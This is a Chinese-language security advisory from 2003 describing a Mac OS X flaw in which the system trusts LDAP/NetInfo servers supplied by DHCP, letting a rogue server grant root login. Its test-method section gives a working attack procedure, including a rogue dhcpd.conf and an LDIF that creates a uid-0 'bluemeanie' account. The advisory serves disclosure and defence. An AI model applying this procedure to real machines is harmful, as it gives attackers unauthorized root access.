Apple MacOS X DHCP应答ROOT权限访问漏洞
发布日期: 2003-12-2
影响系统:
Apple MacOS X Server 10.3.1
Apple MacOS X Server 10.3
Apple MacOS X Server 10.2.8
Apple MacOS X Server 10.2.7
Apple MacOS X Server 10.2.6
Apple MacOS X Server 10.2.5
Apple MacOS X Server 10.2.4
Apple MacOS X Server 10.2.3
Apple MacOS X Server 10.2.2
Apple MacOS X Server 10.2
Apple MacOS X 10.0.3
Apple MacOS X 10.0.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 9110
Mac OS X是一款使用在Mac机器上的操作系统,基于BSD系统。
Mac OS X系统在处理DHCP应答时存在问题,远程安全者可以利用这个漏洞以ROOT权限访问受影响系统。
默认情况下,受此漏洞影响的Mac OS X系统会尝试在所有可用接口上进行DHCP协商。即使在Airport卡安装在系统上,但附近没有网络,也会默认关联任何网络并使用DHCP获得地址。如果可连接一DHCP或者NetInfo服务器,系统也会使用它们提供DHCP提供的字段。
在受此漏洞影响的系统上"Directory Access"默认设置会盲目使用和信任这些服务器提供的DHCP字段,并且系统没有防止以uid 0的任何登录名的登录。比如,LDAP或NetInfo服务器上包含一个用户名为"bluemeanie", uid 0,系统会没有任何检查登录系统窗口,或者任何网络提供的房屋,如SSH。
在多数情况下,Mac会需要启动到恶意环境来利用这个漏洞(Netinfod进程必须重新启动以使恶意服务器插入到其验证资源列表)。
<*来源:William Carrel
链接:http://www.carrel.org/dhcp-vuln.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!
William Carrel 提供了如下测试方法:
1、安装一个新的支持WIFI卡的UNIX系统。
2、配置WIFI卡地址为192.168.42.1/24,如果可能把WIFI卡放到任意网络名的AP模式。
3、安装ISC dhcpd。
4、在dhcpd.conf文件中插入如下行:
option ldap-server code 95 = text;
authoritative;
subnet 192.168.42.0 netmask 255.255.255.0 {
range 192.168.42.2 192.168.42.254;
option ldap-server "ldap://192.168.42.1/ou=evil";
}
5、安装OpenLDAP。
6、建立一个OD映射信息的/tmp/odconfig.xml文件,作为选择,ou=macosxodconfig,ou=evil对象可从使用目录访问应用程序的OS X机器上建立。
7、建立包含如下内容的evil.ldif并传递给ldapadd(1):
dn: ou=evil
objectClass: organizationalUnit
ou: people
dn: uid=bluemeanie,ou=evil
objectClass: posixAccount
uid: bluemeanie
userPassword: {crypt}some_crypted_password
cn: Malicious User
gecos: Malicious User
homeDirectory: /
loginShell: /bin/sh
uidNumber: 0
gidNumber: 0
dn: ou=macosxodconfig,ou=evil
objectClass: organizationalUnit
ou: macosxodconfig
description:< file://tmp/odconfig.xml
8、使用ldapsearch(1)证实如下记录的建立。
9、启动WIFI接口上的dhcpd。
10、观察/var/db/dhcpd,查看哪个主机装载此配置。
11、利用Network Utility.app或nmap端口扫描工具查找服务。
12、使用bluemeanie (uidNumber 0)登录服务。
建议:
--------------------------------------------------------------------------------
厂商补丁:
Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.apple.com